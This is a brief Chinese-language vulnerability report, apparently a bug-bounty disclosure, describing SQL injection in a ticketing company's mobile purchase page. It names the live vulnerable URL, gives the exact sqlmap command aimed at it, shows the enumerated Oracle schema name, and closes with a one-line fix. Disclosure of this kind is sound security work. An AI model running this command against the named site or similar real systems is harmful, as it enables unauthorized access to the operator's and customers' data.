中演票务通某处SQL注入漏洞
漏洞存在于手机购票、
漏洞地址:http://m.t3.com.cn:80/detail/onlineId/8367430815293495253
sqlmap -u "http://m.t3.com.cn:80/detail/onlineId/8367430815293495253*"
跑起来:
current schema (equivalent to database on Oracle): 'WEBDBA'
表:
其他信息就不去看了、over
修复方案:
敏感内容过滤